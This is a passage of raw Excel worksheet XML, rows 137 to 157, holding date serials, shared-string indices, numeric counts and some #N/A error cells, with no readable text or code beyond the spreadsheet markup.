      <c r="B137" s="51">
        <v>43746.727824131944</v>
      </c>
      <c r="C137" s="1" t="s">
        <v>3108</v>
      </c>
      <c r="D137" s="26">
        <v>121</v>
      </c>
      <c r="E137" s="1" t="s">
        <v>3123</v>
      </c>
      <c r="F137" s="26">
        <v>100</v>
      </c>
      <c r="G137" s="57" t="s">
        <v>3124</v>
      </c>
      <c r="H137" s="1" t="s">
        <v>3125</v>
      </c>
      <c r="I137" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J137" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K137" s="1" t="s">
        <v>14</v>
      </c>
      <c r="L137" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M137" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N137" s="1" t="s">
        <v>613</v>
      </c>
      <c r="O137" s="1" t="s">
        <v>1347</v>
      </c>
      <c r="P137" s="1" t="s">
        <v>612</v>
      </c>
      <c r="Q137" s="1" t="s">
        <v>3662</v>
      </c>
      <c r="R137" s="82">
        <v>136592</v>
      </c>
      <c r="S137" s="82">
        <v>100404</v>
      </c>
      <c r="T137" s="82">
        <v>586994</v>
      </c>
      <c r="U137" s="82">
        <v>906170</v>
      </c>
      <c r="V137" s="82">
        <v>899335</v>
      </c>
      <c r="W137" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="138" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A138" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B138" s="51">
        <v>44203.677725046298</v>
      </c>
      <c r="C138" s="1" t="s">
        <v>3126</v>
      </c>
      <c r="D138" s="26">
        <v>101</v>
      </c>
      <c r="E138" s="1" t="s">
        <v>3127</v>
      </c>
      <c r="F138" s="26">
        <v>101</v>
      </c>
      <c r="G138" s="57" t="s">
        <v>3128</v>
      </c>
      <c r="H138" s="1" t="s">
        <v>3129</v>
      </c>
      <c r="I138" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J138" s="1" t="s">
        <v>3130</v>
      </c>
      <c r="K138" s="1" t="s">
        <v>14</v>
      </c>
      <c r="L138" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M138" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N138" s="1" t="s">
        <v>613</v>
      </c>
      <c r="O138" s="1" t="s">
        <v>1336</v>
      </c>
      <c r="P138" s="1"/>
      <c r="Q138" s="1" t="s">
        <v>3664</v>
      </c>
      <c r="R138" s="82">
        <v>5780</v>
      </c>
      <c r="S138" s="82">
        <v>4793</v>
      </c>
      <c r="T138" s="82">
        <v>33617</v>
      </c>
      <c r="U138" s="82">
        <v>47380</v>
      </c>
      <c r="V138" s="82">
        <v>39280</v>
      </c>
      <c r="W138" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="139" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A139" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B139" s="51">
        <v>43782.656118692132</v>
      </c>
      <c r="C139" s="1" t="s">
        <v>3132</v>
      </c>
      <c r="D139" s="26">
        <v>111</v>
      </c>
      <c r="E139" s="1" t="s">
        <v>3133</v>
      </c>
      <c r="F139" s="26">
        <v>100</v>
      </c>
      <c r="G139" s="57" t="s">
        <v>3134</v>
      </c>
      <c r="H139" s="1" t="s">
        <v>3135</v>
      </c>
      <c r="I139" s="1" t="s">
        <v>833</v>
      </c>
      <c r="J139" s="1" t="s">
        <v>25</v>
      </c>
      <c r="K139" s="1" t="s">
        <v>25</v>
      </c>
      <c r="L139" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M139" s="1" t="s">
        <v>834</v>
      </c>
      <c r="N139" s="1" t="s">
        <v>835</v>
      </c>
      <c r="O139" s="1"/>
      <c r="P139" s="1"/>
      <c r="Q139" s="1" t="s">
        <v>3665</v>
      </c>
      <c r="R139" s="82">
        <v>2815</v>
      </c>
      <c r="S139" s="82">
        <v>1721</v>
      </c>
      <c r="T139" s="82">
        <v>10795</v>
      </c>
      <c r="U139" s="82">
        <v>21586</v>
      </c>
      <c r="V139" s="82">
        <v>23472</v>
      </c>
      <c r="W139" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="140" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A140" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B140" s="51">
        <v>43850.488308136577</v>
      </c>
      <c r="C140" s="1" t="s">
        <v>3137</v>
      </c>
      <c r="D140" s="26">
        <v>100</v>
      </c>
      <c r="E140" s="1" t="s">
        <v>3138</v>
      </c>
      <c r="F140" s="26">
        <v>100</v>
      </c>
      <c r="G140" s="57" t="s">
        <v>3139</v>
      </c>
      <c r="H140" s="1" t="s">
        <v>3140</v>
      </c>
      <c r="I140" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J140" s="1" t="s">
        <v>3130</v>
      </c>
      <c r="K140" s="1" t="s">
        <v>14</v>
      </c>
      <c r="L140" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M140" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N140" s="1" t="s">
        <v>613</v>
      </c>
      <c r="O140" s="1" t="s">
        <v>1395</v>
      </c>
      <c r="P140" s="1"/>
      <c r="Q140" s="1" t="s">
        <v>3666</v>
      </c>
      <c r="R140" s="82">
        <v>19758</v>
      </c>
      <c r="S140" s="82">
        <v>19097</v>
      </c>
      <c r="T140" s="82">
        <v>167120</v>
      </c>
      <c r="U140" s="82">
        <v>287284</v>
      </c>
      <c r="V140" s="82">
        <v>359576</v>
      </c>
      <c r="W140" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="141" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A141" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B141" s="51">
        <v>43787.387686296293</v>
      </c>
      <c r="C141" s="1" t="s">
        <v>3142</v>
      </c>
      <c r="D141" s="26">
        <v>110</v>
      </c>
      <c r="E141" s="1" t="s">
        <v>3143</v>
      </c>
      <c r="F141" s="26">
        <v>110</v>
      </c>
      <c r="G141" s="57" t="s">
        <v>3144</v>
      </c>
      <c r="H141" s="1" t="s">
        <v>3145</v>
      </c>
      <c r="I141" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J141" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K141" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L141" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M141" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N141" s="2" t="s">
        <v>221</v>
      </c>
      <c r="O141" s="1" t="s">
        <v>105</v>
      </c>
      <c r="P141" s="1" t="s">
        <v>222</v>
      </c>
      <c r="Q141" s="1" t="s">
        <v>3667</v>
      </c>
      <c r="R141" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S141" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T141" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U141" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V141" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W141" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="142" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A142" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B142" s="51">
        <v>43797.702984733798</v>
      </c>
      <c r="C142" s="1" t="s">
        <v>3147</v>
      </c>
      <c r="D142" s="26">
        <v>107</v>
      </c>
      <c r="E142" s="1" t="s">
        <v>3148</v>
      </c>
      <c r="F142" s="26">
        <v>101</v>
      </c>
      <c r="G142" s="57" t="s">
        <v>3149</v>
      </c>
      <c r="H142" s="1" t="s">
        <v>3150</v>
      </c>
      <c r="I142" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J142" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K142" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L142" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M142" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N142" s="2" t="s">
        <v>221</v>
      </c>
      <c r="O142" s="1" t="s">
        <v>1561</v>
      </c>
      <c r="P142" s="1" t="s">
        <v>222</v>
      </c>
      <c r="Q142" s="1" t="s">
        <v>3668</v>
      </c>
      <c r="R142" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S142" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T142" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U142" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V142" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W142" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="143" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A143" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B143" s="51">
        <v>44019.161265856485</v>
      </c>
      <c r="C143" s="1" t="s">
        <v>3147</v>
      </c>
      <c r="D143" s="26">
        <v>107</v>
      </c>
      <c r="E143" s="1" t="s">
        <v>3152</v>
      </c>
      <c r="F143" s="26">
        <v>106</v>
      </c>
      <c r="G143" s="93" t="s">
        <v>3153</v>
      </c>
      <c r="H143" s="1" t="s">
        <v>3154</v>
      </c>
      <c r="I143" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J143" s="1" t="s">
        <v>438</v>
      </c>
      <c r="K143" s="1" t="s">
        <v>38</v>
      </c>
      <c r="L143" s="1" t="s">
        <v>38</v>
      </c>
      <c r="M143" s="1" t="s">
        <v>38</v>
      </c>
      <c r="N143" s="1" t="s">
        <v>38</v>
      </c>
      <c r="O143" s="1" t="s">
        <v>3155</v>
      </c>
      <c r="P143" s="1" t="s">
        <v>512</v>
      </c>
      <c r="Q143" s="1" t="s">
        <v>3668</v>
      </c>
      <c r="R143" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S143" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T143" s="82">
        <v>1749</v>
      </c>
      <c r="U143" s="82">
        <v>2548</v>
      </c>
      <c r="V143" s="82">
        <v>5572</v>
      </c>
      <c r="W143" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="144" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A144" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B144" s="51">
        <v>44076.007642997683</v>
      </c>
      <c r="C144" s="1" t="s">
        <v>3156</v>
      </c>
      <c r="D144" s="26">
        <v>101</v>
      </c>
      <c r="E144" s="1" t="s">
        <v>3157</v>
      </c>
      <c r="F144" s="26">
        <v>101</v>
      </c>
      <c r="G144" s="57" t="s">
        <v>3158</v>
      </c>
      <c r="H144" s="1" t="s">
        <v>3159</v>
      </c>
      <c r="I144" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J144" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K144" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L144" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M144" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N144" s="1"/>
      <c r="O144" s="1"/>
      <c r="P144" s="1" t="s">
        <v>1691</v>
      </c>
      <c r="Q144" s="1" t="s">
        <v>3669</v>
      </c>
      <c r="R144" s="82">
        <v>496</v>
      </c>
      <c r="S144" s="82">
        <v>1138</v>
      </c>
      <c r="T144" s="82">
        <v>2844</v>
      </c>
      <c r="U144" s="82">
        <v>5708</v>
      </c>
      <c r="V144" s="82">
        <v>8033</v>
      </c>
      <c r="W144" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="145" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A145" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B145" s="51">
        <v>43782.656118761573</v>
      </c>
      <c r="C145" s="1" t="s">
        <v>3132</v>
      </c>
      <c r="D145" s="26">
        <v>111</v>
      </c>
      <c r="E145" s="1" t="s">
        <v>3161</v>
      </c>
      <c r="F145" s="26">
        <v>100</v>
      </c>
      <c r="G145" s="57" t="s">
        <v>3162</v>
      </c>
      <c r="H145" s="1" t="s">
        <v>3163</v>
      </c>
      <c r="I145" s="1" t="s">
        <v>833</v>
      </c>
      <c r="J145" s="1" t="s">
        <v>25</v>
      </c>
      <c r="K145" s="1" t="s">
        <v>25</v>
      </c>
      <c r="L145" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M145" s="1" t="s">
        <v>834</v>
      </c>
      <c r="N145" s="1" t="s">
        <v>835</v>
      </c>
      <c r="O145" s="1"/>
      <c r="P145" s="1"/>
      <c r="Q145" s="1" t="s">
        <v>3665</v>
      </c>
      <c r="R145" s="82">
        <v>3159</v>
      </c>
      <c r="S145" s="82">
        <v>1921</v>
      </c>
      <c r="T145" s="82">
        <v>11829</v>
      </c>
      <c r="U145" s="82">
        <v>24497</v>
      </c>
      <c r="V145" s="82">
        <v>26708</v>
      </c>
      <c r="W145" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="146" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A146" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B146" s="51">
        <v>43782.656118726853</v>
      </c>
      <c r="C146" s="1" t="s">
        <v>3132</v>
      </c>
      <c r="D146" s="26">
        <v>111</v>
      </c>
      <c r="E146" s="1" t="s">
        <v>3164</v>
      </c>
      <c r="F146" s="26">
        <v>100</v>
      </c>
      <c r="G146" s="57" t="s">
        <v>3165</v>
      </c>
      <c r="H146" s="1" t="s">
        <v>3166</v>
      </c>
      <c r="I146" s="1" t="s">
        <v>833</v>
      </c>
      <c r="J146" s="1" t="s">
        <v>25</v>
      </c>
      <c r="K146" s="1" t="s">
        <v>25</v>
      </c>
      <c r="L146" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M146" s="1" t="s">
        <v>834</v>
      </c>
      <c r="N146" s="1" t="s">
        <v>835</v>
      </c>
      <c r="O146" s="1"/>
      <c r="P146" s="1"/>
      <c r="Q146" s="1" t="s">
        <v>3665</v>
      </c>
      <c r="R146" s="82">
        <v>94</v>
      </c>
      <c r="S146" s="82">
        <v>67</v>
      </c>
      <c r="T146" s="82">
        <v>492</v>
      </c>
      <c r="U146" s="82">
        <v>1098</v>
      </c>
      <c r="V146" s="82">
        <v>1047</v>
      </c>
      <c r="W146" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="147" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A147" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B147" s="51">
        <v>43782.497609467595</v>
      </c>
      <c r="C147" s="1" t="s">
        <v>1769</v>
      </c>
      <c r="D147" s="26">
        <v>102</v>
      </c>
      <c r="E147" s="1" t="s">
        <v>3167</v>
      </c>
      <c r="F147" s="26">
        <v>101</v>
      </c>
      <c r="G147" s="57" t="s">
        <v>3168</v>
      </c>
      <c r="H147" s="1" t="s">
        <v>3169</v>
      </c>
      <c r="I147" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J147" s="1" t="s">
        <v>744</v>
      </c>
      <c r="K147" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L147" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M147" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N147" s="1"/>
      <c r="O147" s="1" t="s">
        <v>1778</v>
      </c>
      <c r="P147" s="1" t="s">
        <v>745</v>
      </c>
      <c r="Q147" s="1" t="s">
        <v>3657</v>
      </c>
      <c r="R147" s="82">
        <v>4454</v>
      </c>
      <c r="S147" s="82">
        <v>2696</v>
      </c>
      <c r="T147" s="82">
        <v>18322</v>
      </c>
      <c r="U147" s="82">
        <v>35797</v>
      </c>
      <c r="V147" s="82">
        <v>49180</v>
      </c>
      <c r="W147" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="148" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A148" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B148" s="51">
        <v>43782.497609502316</v>
      </c>
      <c r="C148" s="1" t="s">
        <v>1769</v>
      </c>
      <c r="D148" s="26">
        <v>102</v>
      </c>
      <c r="E148" s="1" t="s">
        <v>3170</v>
      </c>
      <c r="F148" s="26">
        <v>101</v>
      </c>
      <c r="G148" s="57" t="s">
        <v>3171</v>
      </c>
      <c r="H148" s="1" t="s">
        <v>1786</v>
      </c>
      <c r="I148" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J148" s="1" t="s">
        <v>744</v>
      </c>
      <c r="K148" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L148" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M148" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N148" s="1"/>
      <c r="O148" s="1" t="s">
        <v>1778</v>
      </c>
      <c r="P148" s="1" t="s">
        <v>745</v>
      </c>
      <c r="Q148" s="1" t="s">
        <v>3657</v>
      </c>
      <c r="R148" s="82">
        <v>87</v>
      </c>
      <c r="S148" s="82">
        <v>38</v>
      </c>
      <c r="T148" s="82">
        <v>299</v>
      </c>
      <c r="U148" s="82">
        <v>568</v>
      </c>
      <c r="V148" s="82">
        <v>851</v>
      </c>
      <c r="W148" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="149" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A149" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B149" s="51">
        <v>44162.734298738425</v>
      </c>
      <c r="C149" s="1" t="s">
        <v>3132</v>
      </c>
      <c r="D149" s="26">
        <v>111</v>
      </c>
      <c r="E149" s="1" t="s">
        <v>3172</v>
      </c>
      <c r="F149" s="26">
        <v>101</v>
      </c>
      <c r="G149" s="57" t="s">
        <v>3173</v>
      </c>
      <c r="H149" s="1" t="s">
        <v>3174</v>
      </c>
      <c r="I149" s="1" t="s">
        <v>833</v>
      </c>
      <c r="J149" s="1" t="s">
        <v>25</v>
      </c>
      <c r="K149" s="1" t="s">
        <v>25</v>
      </c>
      <c r="L149" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M149" s="1" t="s">
        <v>834</v>
      </c>
      <c r="N149" s="1" t="s">
        <v>835</v>
      </c>
      <c r="O149" s="1"/>
      <c r="P149" s="1"/>
      <c r="Q149" s="1" t="s">
        <v>3665</v>
      </c>
      <c r="R149" s="82">
        <v>125</v>
      </c>
      <c r="S149" s="82">
        <v>69</v>
      </c>
      <c r="T149" s="82">
        <v>444</v>
      </c>
      <c r="U149" s="82">
        <v>1179</v>
      </c>
      <c r="V149" s="82">
        <v>1473</v>
      </c>
      <c r="W149" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="150" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A150" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B150" s="51">
        <v>43999.762850706022</v>
      </c>
      <c r="C150" s="1" t="s">
        <v>3175</v>
      </c>
      <c r="D150" s="26">
        <v>151</v>
      </c>
      <c r="E150" s="1" t="s">
        <v>3176</v>
      </c>
      <c r="F150" s="26">
        <v>114</v>
      </c>
      <c r="G150" s="57" t="s">
        <v>3177</v>
      </c>
      <c r="H150" s="1" t="s">
        <v>2363</v>
      </c>
      <c r="I150" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J150" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K150" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L150" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M150" s="1"/>
      <c r="N150" s="1"/>
      <c r="O150" s="1" t="s">
        <v>2364</v>
      </c>
      <c r="P150" s="1" t="s">
        <v>920</v>
      </c>
      <c r="Q150" s="1" t="s">
        <v>3670</v>
      </c>
      <c r="R150" s="82">
        <v>32187</v>
      </c>
      <c r="S150" s="82">
        <v>26144</v>
      </c>
      <c r="T150" s="82">
        <v>43628</v>
      </c>
      <c r="U150" s="82">
        <v>290979</v>
      </c>
      <c r="V150" s="82">
        <v>439408</v>
      </c>
      <c r="W150" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="151" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A151" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B151" s="51">
        <v>43907.49058435185</v>
      </c>
      <c r="C151" s="1" t="s">
        <v>3175</v>
      </c>
      <c r="D151" s="26">
        <v>151</v>
      </c>
      <c r="E151" s="1" t="s">
        <v>3179</v>
      </c>
      <c r="F151" s="26">
        <v>100</v>
      </c>
      <c r="G151" s="57" t="s">
        <v>3180</v>
      </c>
      <c r="H151" s="1" t="s">
        <v>1071</v>
      </c>
      <c r="I151" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J151" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K151" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L151" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M151" s="1"/>
      <c r="N151" s="1"/>
      <c r="O151" s="1" t="s">
        <v>3181</v>
      </c>
      <c r="P151" s="1"/>
      <c r="Q151" s="1" t="s">
        <v>3670</v>
      </c>
      <c r="R151" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S151" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T151" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U151" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V151" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W151" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="152" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A152" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B152" s="51">
        <v>43986.726563715281</v>
      </c>
      <c r="C152" s="1" t="s">
        <v>3175</v>
      </c>
      <c r="D152" s="26">
        <v>151</v>
      </c>
      <c r="E152" s="1" t="s">
        <v>3182</v>
      </c>
      <c r="F152" s="26">
        <v>103</v>
      </c>
      <c r="G152" s="57" t="s">
        <v>3183</v>
      </c>
      <c r="H152" s="1" t="s">
        <v>3184</v>
      </c>
      <c r="I152" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J152" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K152" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L152" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M152" s="1"/>
      <c r="N152" s="1"/>
      <c r="O152" s="1" t="s">
        <v>2370</v>
      </c>
      <c r="P152" s="1" t="s">
        <v>181</v>
      </c>
      <c r="Q152" s="1" t="s">
        <v>3670</v>
      </c>
      <c r="R152" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S152" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T152" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U152" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V152" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W152" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="153" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A153" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B153" s="51">
        <v>43907.490584409723</v>
      </c>
      <c r="C153" s="1" t="s">
        <v>3175</v>
      </c>
      <c r="D153" s="26">
        <v>151</v>
      </c>
      <c r="E153" s="1" t="s">
        <v>3185</v>
      </c>
      <c r="F153" s="26">
        <v>103</v>
      </c>
      <c r="G153" s="57" t="s">
        <v>3186</v>
      </c>
      <c r="H153" s="1" t="s">
        <v>3187</v>
      </c>
      <c r="I153" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J153" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K153" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L153" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M153" s="1"/>
      <c r="N153" s="1"/>
      <c r="O153" s="1" t="s">
        <v>2370</v>
      </c>
      <c r="P153" s="1" t="s">
        <v>181</v>
      </c>
      <c r="Q153" s="1" t="s">
        <v>3670</v>
      </c>
      <c r="R153" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S153" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T153" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U153" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V153" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W153" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="154" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A154" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B154" s="51">
        <v>43795.860850034725</v>
      </c>
      <c r="C154" s="1" t="s">
        <v>3188</v>
      </c>
      <c r="D154" s="26">
        <v>124</v>
      </c>
      <c r="E154" s="16" t="s">
        <v>3189</v>
      </c>
      <c r="F154" s="26">
        <v>102</v>
      </c>
      <c r="G154" s="57" t="s">
        <v>3190</v>
      </c>
      <c r="H154" s="1" t="s">
        <v>3191</v>
      </c>
      <c r="I154" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J154" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K154" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L154" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M154" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N154" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O154" s="1"/>
      <c r="P154" s="1" t="s">
        <v>1824</v>
      </c>
      <c r="Q154" s="1" t="s">
        <v>3671</v>
      </c>
      <c r="R154" s="82">
        <v>122</v>
      </c>
      <c r="S154" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T154" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U154" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V154" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W154" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="155" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A155" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B155" s="51">
        <v>44040.762134421297</v>
      </c>
      <c r="C155" s="1" t="s">
        <v>3188</v>
      </c>
      <c r="D155" s="26">
        <v>124</v>
      </c>
      <c r="E155" s="1" t="s">
        <v>3193</v>
      </c>
      <c r="F155" s="26">
        <v>112</v>
      </c>
      <c r="G155" s="57" t="s">
        <v>3194</v>
      </c>
      <c r="H155" s="1" t="s">
        <v>3195</v>
      </c>
      <c r="I155" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J155" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K155" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L155" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M155" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N155" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O155" s="1"/>
      <c r="P155" s="1"/>
      <c r="Q155" s="1" t="s">
        <v>3671</v>
      </c>
      <c r="R155" s="82">
        <v>17</v>
      </c>
      <c r="S155" s="82">
        <v>4</v>
      </c>
      <c r="T155" s="82">
        <v>1788</v>
      </c>
      <c r="U155" s="82">
        <v>2602</v>
      </c>
      <c r="V155" s="82">
        <v>102</v>
      </c>
      <c r="W155" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="156" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A156" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B156" s="51">
        <v>44119.849477974538</v>
      </c>
      <c r="C156" s="1" t="s">
        <v>3188</v>
      </c>
      <c r="D156" s="26">
        <v>124</v>
      </c>
      <c r="E156" s="1" t="s">
        <v>3196</v>
      </c>
      <c r="F156" s="26">
        <v>104</v>
      </c>
      <c r="G156" s="57" t="s">
        <v>3197</v>
      </c>
      <c r="H156" s="1" t="s">
        <v>3198</v>
      </c>
      <c r="I156" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J156" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K156" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L156" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M156" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N156" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O156" s="1"/>
      <c r="P156" s="1"/>
      <c r="Q156" s="1" t="s">
        <v>3671</v>
      </c>
      <c r="R156" s="82">
        <v>405117</v>
      </c>
      <c r="S156" s="82">
        <v>326149</v>
      </c>
      <c r="T156" s="82">
        <v>2243305</v>
      </c>
      <c r="U156" s="82">
        <v>3636291</v>
      </c>
      <c r="V156" s="82">
        <v>4072765</v>
      </c>
      <c r="W156" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="157" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A157" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B157" s="51">
        <v>43764.136447372686</v>
      </c>
      <c r="C157" s="1" t="s">
        <v>3199</v>
      </c>
      <c r="D157" s="26">
        <v>206</v>
      </c>
      <c r="E157" s="1" t="s">
        <v>3200</v>
      </c>
      <c r="F157" s="26">
        <v>110</v>
      </c>
      <c r="G157" s="57" t="s">
        <v>3201</v>
      </c>
      <c r="H157" s="1" t="s">
        <v>2972</v>
      </c>
      <c r="I157" s="16" t="s">
        <v>268</v>
      </c>
      <c r="J157" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K157" s="1" t="s">
        <v>10</v>
      </c>
